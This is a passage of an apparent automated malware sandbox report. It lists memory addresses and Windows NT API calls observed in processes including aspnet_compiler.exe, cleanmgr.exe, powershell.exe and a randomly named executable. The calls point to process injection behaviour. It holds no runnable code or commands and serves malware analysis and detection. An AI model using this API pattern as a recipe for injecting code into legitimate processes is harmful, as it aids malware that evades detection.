                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_01152F90 NtProtectVirtualMemory,13_2_01152F90
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_01152FB0 NtResumeThread,13_2_01152FB0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_01152FA0 NtQuerySection,13_2_01152FA0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_01152FE0 NtCreateFile,13_2_01152FE0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_01152E30 NtWriteVirtualMemory,13_2_01152E30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_01152E80 NtReadVirtualMemory,13_2_01152E80
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_01152EA0 NtAdjustPrivilegesToken,13_2_01152EA0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_01152EE0 NtQueueApcThread,13_2_01152EE0
                    Source: C:\Windows\SysWOW64\cleanmgr.exeCode function: 15_2_04FA35C0 NtCreateMutant,LdrInitializeThunk,15_2_04FA35C0
                    Source: C:\Windows\SysWOW64\cleanmgr.exeCode function: 15_2_04FA4650 NtSuspendThread,LdrInitializeThunk,15_2_04FA4650
                    Source: C:\Windows\SysWOW64\cleanmgr.exeCode function: 15_2_04FA4340 NtSetContextThread,LdrInitializeThunk,15_2_04FA4340
                    Source: C:\Windows\SysWOW64\cleanmgr.exeCode function: 15_2_04FA2CA0 NtQueryInformationToken,LdrInitializeThunk,15_2_04FA2CA0
                    Source: C:\Windows\SysWOW64\cleanmgr.exeCode function: 15_2_04FA2C70 NtFreeVirtualMemory,LdrInitializeThunk,15_2_04FA2C70
                    Source: C:\Windows\SysWOW64\cleanmgr.exeCode function: 15_2_04FA2C60 NtCreateKey,LdrInitializeThunk,15_2_04FA2C60
                    Source: C:\Windows\SysWOW64\cleanmgr.exeCode function: 15_2_04FA2DF0 NtQuerySystemInformation,LdrInitializeThunk,15_2_04FA2DF0
                    Source: C:\Windows\SysWOW64\cleanmgr.exeCode function: 15_2_04FA2DD0 NtDelayExecution,LdrInitializeThunk,15_2_04FA2DD0
                    Source: C:\Windows\SysWOW64\cleanmgr.exeCode function: 15_2_04FA2D30 NtUnmapViewOfSection,LdrInitializeThunk,15_2_04FA2D30
                    Source: C:\Windows\SysWOW64\cleanmgr.exeCode function: 15_2_04FA2D10 NtMapViewOfSection,LdrInitializeThunk,15_2_04FA2D10
                    Source: C:\Windows\SysWOW64\cleanmgr.exeCode function: 15_2_04FA2EE0 NtQueueApcThread,LdrInitializeThunk,15_2_04FA2EE0
                    Source: C:\Windows\SysWOW64\cleanmgr.exeCode function: 15_2_04FA2E80 NtReadVirtualMemory,LdrInitializeThunk,15_2_04FA2E80
                    Source: C:\Windows\SysWOW64\cleanmgr.exeCode function: 15_2_04FA2FE0 NtCreateFile,LdrInitializeThunk,15_2_04FA2FE0
                    Source: C:\Windows\SysWOW64\cleanmgr.exeCode function: 15_2_04FA2FB0 NtResumeThread,LdrInitializeThunk,15_2_04FA2FB0
                    Source: C:\Windows\SysWOW64\cleanmgr.exeCode function: 15_2_04FA2F30 NtCreateSection,LdrInitializeThunk,15_2_04FA2F30
                    Source: C:\Windows\SysWOW64\cleanmgr.exeCode function: 15_2_04FA39B0 NtGetContextThread,LdrInitializeThunk,15_2_04FA39B0
                    Source: C:\Windows\SysWOW64\cleanmgr.exeCode function: 15_2_04FA2AF0 NtWriteFile,LdrInitializeThunk,15_2_04FA2AF0
                    Source: C:\Windows\SysWOW64\cleanmgr.exeCode function: 15_2_04FA2AD0 NtReadFile,LdrInitializeThunk,15_2_04FA2AD0
                    Source: C:\Windows\SysWOW64\cleanmgr.exeCode function: 15_2_04FA2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,15_2_04FA2BF0
                    Source: C:\Windows\SysWOW64\cleanmgr.exeCode function: 15_2_04FA2BE0 NtQueryValueKey,LdrInitializeThunk,15_2_04FA2BE0
                    Source: C:\Windows\SysWOW64\cleanmgr.exeCode function: 15_2_04FA2BA0 NtEnumerateValueKey,LdrInitializeThunk,15_2_04FA2BA0
                    Source: C:\Windows\SysWOW64\cleanmgr.exeCode function: 15_2_04FA2B60 NtClose,LdrInitializeThunk,15_2_04FA2B60
                    Source: C:\Windows\SysWOW64\cleanmgr.exeCode function: 15_2_04FA3090 NtSetValueKey,15_2_04FA3090
                    Source: C:\Windows\SysWOW64\cleanmgr.exeCode function: 15_2_04FA3010 NtOpenDirectoryObject,15_2_04FA3010
                    Source: C:\Windows\SysWOW64\cleanmgr.exeCode function: 15_2_04FA2CF0 NtOpenProcess,15_2_04FA2CF0
                    Source: C:\Windows\SysWOW64\cleanmgr.exeCode function: 15_2_04FA2CC0 NtQueryVirtualMemory,15_2_04FA2CC0
                    Source: C:\Windows\SysWOW64\cleanmgr.exeCode function: 15_2_04FA2C00 NtQueryInformationProcess,15_2_04FA2C00
                    Source: C:\Windows\SysWOW64\cleanmgr.exeCode function: 15_2_04FA2DB0 NtEnumerateKey,15_2_04FA2DB0
                    Source: C:\Windows\SysWOW64\cleanmgr.exeCode function: 15_2_04FA3D70 NtOpenThread,15_2_04FA3D70
                    Source: C:\Windows\SysWOW64\cleanmgr.exeCode function: 15_2_04FA3D10 NtOpenProcessToken,15_2_04FA3D10
                    Source: C:\Windows\SysWOW64\cleanmgr.exeCode function: 15_2_04FA2D00 NtSetInformationFile,15_2_04FA2D00
                    Source: C:\Windows\SysWOW64\cleanmgr.exeCode function: 15_2_04FA2EA0 NtAdjustPrivilegesToken,15_2_04FA2EA0
                    Source: C:\Windows\SysWOW64\cleanmgr.exeCode function: 15_2_04FA2E30 NtWriteVirtualMemory,15_2_04FA2E30
                    Source: C:\Windows\SysWOW64\cleanmgr.exeCode function: 15_2_04FA2FA0 NtQuerySection,15_2_04FA2FA0
                    Source: C:\Windows\SysWOW64\cleanmgr.exeCode function: 15_2_04FA2F90 NtProtectVirtualMemory,15_2_04FA2F90
                    Source: C:\Windows\SysWOW64\cleanmgr.exeCode function: 15_2_04FA2F60 NtCreateProcessEx,15_2_04FA2F60
                    Source: C:\Windows\SysWOW64\cleanmgr.exeCode function: 15_2_04FA2AB0 NtWaitForSingleObject,15_2_04FA2AB0
                    Source: C:\Windows\SysWOW64\cleanmgr.exeCode function: 15_2_04FA2B80 NtQueryInformationFile,15_2_04FA2B80
                    Source: C:\Windows\SysWOW64\cleanmgr.exeCode function: 15_2_02EB9340 NtAllocateVirtualMemory,15_2_02EB9340
                    Source: C:\Windows\SysWOW64\cleanmgr.exeCode function: 15_2_02EB9030 NtReadFile,15_2_02EB9030
                    Source: C:\Windows\SysWOW64\cleanmgr.exeCode function: 15_2_02EB91D0 NtClose,15_2_02EB91D0
                    Source: C:\Windows\SysWOW64\cleanmgr.exeCode function: 15_2_02EB9130 NtDeleteFile,15_2_02EB9130
                    Source: C:\Windows\SysWOW64\cleanmgr.exeCode function: 15_2_02EB8EC0 NtCreateFile,15_2_02EB8EC0
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_04D09BC810_2_04D09BC8
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_04D0928E10_2_04D0928E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0040197813_2_00401978
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0041844313_2_00418443
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0040306013_2_00403060
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_004011F013_2_004011F0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0042EAF313_2_0042EAF3
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0040239E13_2_0040239E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_004023A013_2_004023A0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0040FC6A13_2_0040FC6A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0040FC7313_2_0040FC73
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_00402C1113_2_00402C11
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0041662313_2_00416623
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0041662213_2_00416622
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0040FE9313_2_0040FE93
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0040DF1313_2_0040DF13
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_004027C013_2_004027C0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_004027BC13_2_004027BC
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_011BA11813_2_011BA118
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0111010013_2_01110100
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_011A815813_2_011A8158
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0110F17213_2_0110F172
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_011EB16B13_2_011EB16B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0115516C13_2_0115516C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0112B1B013_2_0112B1B0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_011E01AA13_2_011E01AA
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_011D81CC13_2_011D81CC
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_011CF0CC13_2_011CF0CC
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_011270C013_2_011270C0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_011D70E913_2_011D70E9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_011DF0E013_2_011DF0E0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_011D132D13_2_011D132D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_011DA35213_2_011DA352
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0110D34C13_2_0110D34C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0116739A13_2_0116739A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0112E3F013_2_0112E3F0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_011E03E613_2_011E03E6
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_011C027413_2_011C0274
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_011252A013_2_011252A0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0113B2C013_2_0113B2C0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_011C12ED13_2_011C12ED
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0112053513_2_01120535
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_011D757113_2_011D7571
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_011E059113_2_011E0591
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_011BD5B013_2_011BD5B0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_011DF43F13_2_011DF43F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_011D244613_2_011D2446
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0111146013_2_01111460
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_011CE4F613_2_011CE4F6
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0114475013_2_01144750
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0112077013_2_01120770
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_011DF7B013_2_011DF7B0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0111C7C013_2_0111C7C0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_011D16CC13_2_011D16CC
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0113C6E013_2_0113C6E0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0112995013_2_01129950
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0113B95013_2_0113B950
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0113696213_2_01136962
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_011229A013_2_011229A0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_011EA9A613_2_011EA9A6
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0118D80013_2_0118D800
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0112284013_2_01122840
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0112A84013_2_0112A840
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_011068B813_2_011068B8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0114E8F013_2_0114E8F0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_011238E013_2_011238E0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_011DAB4013_2_011DAB40
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_011DFB7613_2_011DFB76
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0113FB8013_2_0113FB80
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_011D6BD713_2_011D6BD7
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_01195BF013_2_01195BF0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0115DBF913_2_0115DBF9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_011DFA4913_2_011DFA49
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_011D7A4613_2_011D7A46
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_01193A6C13_2_01193A6C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0111EA8013_2_0111EA80
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_01165AA013_2_01165AA0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_011BDAAC13_2_011BDAAC
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_011CDAC613_2_011CDAC6
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0112AD0013_2_0112AD00
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_011D1D5A13_2_011D1D5A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_01123D4013_2_01123D40
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_011D7D7313_2_011D7D73
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_01138DBF13_2_01138DBF
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0113FDC013_2_0113FDC0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0111ADE013_2_0111ADE0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_01120C0013_2_01120C00
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_01199C3213_2_01199C32
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_011C0CB513_2_011C0CB5
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_01110CF213_2_01110CF2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_011DFCF213_2_011DFCF2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_011DFF0913_2_011DFF09
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_01140F3013_2_01140F30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_01162F2813_2_01162F28
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_01194F4013_2_01194F40
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_01121F9213_2_01121F92
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_011DFFB113_2_011DFFB1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0119EFA013_2_0119EFA0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_01112FC813_2_01112FC8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0112CFE013_2_0112CFE0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_011DEE2613_2_011DEE26
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_01120E5913_2_01120E59
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_01132E9013_2_01132E90
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_011DCE9313_2_011DCE93
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_01129EB013_2_01129EB0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_011DEEDB13_2_011DEEDB
                    Source: C:\Program Files (x86)\uhXVydjeEbSCoHZeOBkPYzxewZEyisEFGekWjjbKpmYIRxkDrAIGKBGrfEDxuUeCCeLAcrANKnVhFt\TjxlUxenxgDChq.exeCode function: 14_2_033FEA4714_2_033FEA47
                    Source: C:\Program Files (x86)\uhXVydjeEbSCoHZeOBkPYzxewZEyisEFGekWjjbKpmYIRxkDrAIGKBGrfEDxuUeCCeLAcrANKnVhFt\TjxlUxenxgDChq.exeCode function: 14_2_033FCAC714_2_033FCAC7
                    Source: C:\Program Files (x86)\uhXVydjeEbSCoHZeOBkPYzxewZEyisEFGekWjjbKpmYIRxkDrAIGKBGrfEDxuUeCCeLAcrANKnVhFt\TjxlUxenxgDChq.exeCode function: 14_2_034051D614_2_034051D6
                    Source: C:\Program Files (x86)\uhXVydjeEbSCoHZeOBkPYzxewZEyisEFGekWjjbKpmYIRxkDrAIGKBGrfEDxuUeCCeLAcrANKnVhFt\TjxlUxenxgDChq.exeCode function: 14_2_034051D714_2_034051D7
                    Source: C:\Program Files (x86)\uhXVydjeEbSCoHZeOBkPYzxewZEyisEFGekWjjbKpmYIRxkDrAIGKBGrfEDxuUeCCeLAcrANKnVhFt\TjxlUxenxgDChq.exeCode function: 14_2_033FE82714_2_033FE827
                    Source: C:\Program Files (x86)\uhXVydjeEbSCoHZeOBkPYzxewZEyisEFGekWjjbKpmYIRxkDrAIGKBGrfEDxuUeCCeLAcrANKnVhFt\TjxlUxenxgDChq.exeCode function: 14_2_033FE81E14_2_033FE81E
                    Source: C:\Program Files (x86)\uhXVydjeEbSCoHZeOBkPYzxewZEyisEFGekWjjbKpmYIRxkDrAIGKBGrfEDxuUeCCeLAcrANKnVhFt\TjxlUxenxgDChq.exeCode function: 14_2_03406EA014_2_03406EA0
                    Source: C:\Program Files (x86)\uhXVydjeEbSCoHZeOBkPYzxewZEyisEFGekWjjbKpmYIRxkDrAIGKBGrfEDxuUeCCeLAcrANKnVhFt\TjxlUxenxgDChq.exeCode function: 14_2_0341D6A714_2_0341D6A7
                    Source: C:\Windows\SysWOW64\cleanmgr.exeCode function: 15_2_0502757115_2_05027571
                    Source: C:\Windows\SysWOW64\cleanmgr.exeCode function: 15_2_0503059115_2_05030591
                    Source: C:\Windows\SysWOW64\cleanmgr.exeCode function: 15_2_04F6146015_2_04F61460
                    Source: C:\Windows\SysWOW64\cleanmgr.exeCode function: 15_2_0500D5B015_2_0500D5B0
                    Source: C:\Windows\SysWOW64\cleanmgr.exeCode function: 15_2_0502F43F15_2_0502F43F
                    Source: C:\Windows\SysWOW64\cleanmgr.exeCode function: 15_2_0502244615_2_05022446
                    Source: C:\Windows\SysWOW64\cleanmgr.exeCode function: 15_2_04F7053515_2_04F70535
                    Source: C:\Windows\SysWOW64\cleanmgr.exeCode function: 15_2_0501E4F615_2_0501E4F6
                    Source: C:\Windows\SysWOW64\cleanmgr.exeCode function: 15_2_04F8C6E015_2_04F8C6E0
                    Source: C:\Windows\SysWOW64\cleanmgr.exeCode function: 15_2_0502F7B015_2_0502F7B0
                    Source: C:\Windows\SysWOW64\cleanmgr.exeCode function: 15_2_04F6C7C015_2_04F6C7C0
                    Source: C:\Windows\SysWOW64\cleanmgr.exeCode function: 15_2_04F7077015_2_04F70770
                    Source: C:\Windows\SysWOW64\cleanmgr.exeCode function: 15_2_04F9475015_2_04F94750
                    Source: C:\Windows\SysWOW64\cleanmgr.exeCode function: 15_2_050216CC15_2_050216CC
                    Source: C:\Windows\SysWOW64\cleanmgr.exeCode function: 15_2_0500A11815_2_0500A118
                    Source: C:\Windows\SysWOW64\cleanmgr.exeCode function: 15_2_04F770C015_2_04F770C0
                    Source: C:\Windows\SysWOW64\cleanmgr.exeCode function: 15_2_0503B16B15_2_0503B16B
                    Source: C:\Windows\SysWOW64\cleanmgr.exeCode function: 15_2_050301AA15_2_050301AA
                    Source: C:\Windows\SysWOW64\cleanmgr.exeCode function: 15_2_050281CC15_2_050281CC
                    Source: C:\Windows\SysWOW64\cleanmgr.exeCode function: 15_2_04F7B1B015_2_04F7B1B0
                    Source: C:\Windows\SysWOW64\cleanmgr.exeCode function: 15_2_04F5F17215_2_04F5F172
                    Source: C:\Windows\SysWOW64\cleanmgr.exeCode function: 15_2_04FA516C15_2_04FA516C
                    Source: C:\Windows\SysWOW64\cleanmgr.exeCode function: 15_2_0501F0CC15_2_0501F0CC
                    Source: C:\Windows\SysWOW64\cleanmgr.exeCode function: 15_2_0502F0E015_2_0502F0E0
                    Source: C:\Windows\SysWOW64\cleanmgr.exeCode function: 15_2_050270E915_2_050270E9
                    Source: C:\Windows\SysWOW64\cleanmgr.exeCode function: 15_2_04F6010015_2_04F60100
                    Source: C:\Windows\SysWOW64\cleanmgr.exeCode function: 15_2_0502132D15_2_0502132D
                    Source: C:\Windows\SysWOW64\cleanmgr.exeCode function: 15_2_04F8B2C015_2_04F8B2C0
                    Source: C:\Windows\SysWOW64\cleanmgr.exeCode function: 15_2_0502A35215_2_0502A352
                    Source: C:\Windows\SysWOW64\cleanmgr.exeCode function: 15_2_04F752A015_2_04F752A0
                    Source: C:\Windows\SysWOW64\cleanmgr.exeCode function: 15_2_050303E615_2_050303E6
                    Source: C:\Windows\SysWOW64\cleanmgr.exeCode function: 15_2_04F7E3F015_2_04F7E3F0
                    Source: C:\Windows\SysWOW64\cleanmgr.exeCode function: 15_2_04FB739A15_2_04FB739A
                    Source: C:\Windows\SysWOW64\cleanmgr.exeCode function: 15_2_0501027415_2_05010274
                    Source: C:\Windows\SysWOW64\cleanmgr.exeCode function: 15_2_04F5D34C15_2_04F5D34C
                    Source: C:\Windows\SysWOW64\cleanmgr.exeCode function: 15_2_050112ED15_2_050112ED
                    Source: C:\Windows\SysWOW64\cleanmgr.exeCode function: 15_2_04F60CF215_2_04F60CF2
                    Source: C:\Windows\SysWOW64\cleanmgr.exeCode function: 15_2_05021D5A15_2_05021D5A
                    Source: C:\Windows\SysWOW64\cleanmgr.exeCode function: 15_2_05027D7315_2_05027D73
                    Source: C:\Windows\SysWOW64\cleanmgr.exeCode function: 15_2_04FE9C3215_2_04FE9C32
                    Source: C:\Windows\SysWOW64\cleanmgr.exeCode function: 15_2_04F70C0015_2_04F70C00
                    Source: C:\Windows\SysWOW64\cleanmgr.exeCode function: 15_2_04F6ADE015_2_04F6ADE0
                    Source: C:\Windows\SysWOW64\cleanmgr.exeCode function: 15_2_04F8FDC015_2_04F8FDC0
                    Source: C:\Windows\SysWOW64\cleanmgr.exeCode function: 15_2_04F88DBF15_2_04F88DBF
                    Source: C:\Windows\SysWOW64\cleanmgr.exeCode function: 15_2_05010CB515_2_05010CB5
                    Source: C:\Windows\SysWOW64\cleanmgr.exeCode function: 15_2_04F73D4015_2_04F73D40
                    Source: C:\Windows\SysWOW64\cleanmgr.exeCode function: 15_2_0502FCF215_2_0502FCF2
                    Source: C:\Windows\SysWOW64\cleanmgr.exeCode function: 15_2_04F7AD0015_2_04F7AD00
                    Source: C:\Windows\SysWOW64\cleanmgr.exeCode function: 15_2_0502FF0915_2_0502FF09
                    Source: C:\Windows\SysWOW64\cleanmgr.exeCode function: 15_2_04F79EB015_2_04F79EB0
                    Source: C:\Windows\SysWOW64\cleanmgr.exeCode function: 15_2_04F82E9015_2_04F82E90
                    Source: C:\Windows\SysWOW64\cleanmgr.exeCode function: 15_2_04F70E5915_2_04F70E59
                    Source: C:\Windows\SysWOW64\cleanmgr.exeCode function: 15_2_0502FFB115_2_0502FFB1
                    Source: C:\Windows\SysWOW64\cleanmgr.exeCode function: 15_2_04F7CFE015_2_04F7CFE0
                    Source: C:\Windows\SysWOW64\cleanmgr.exeCode function: 15_2_0502EE2615_2_0502EE26
                    Source: C:\Windows\SysWOW64\cleanmgr.exeCode function: 15_2_04F62FC815_2_04F62FC8
                    Source: C:\Windows\SysWOW64\cleanmgr.exeCode function: 15_2_04F71F9215_2_04F71F92
                    Source: C:\Windows\SysWOW64\cleanmgr.exeCode function: 15_2_0502CE9315_2_0502CE93
                    Source: C:\Windows\SysWOW64\cleanmgr.exeCode function: 15_2_04FE4F4015_2_04FE4F40
                    Source: C:\Windows\SysWOW64\cleanmgr.exeCode function: 15_2_04F90F3015_2_04F90F30
                    Source: C:\Windows\SysWOW64\cleanmgr.exeCode function: 15_2_04FB2F2815_2_04FB2F28
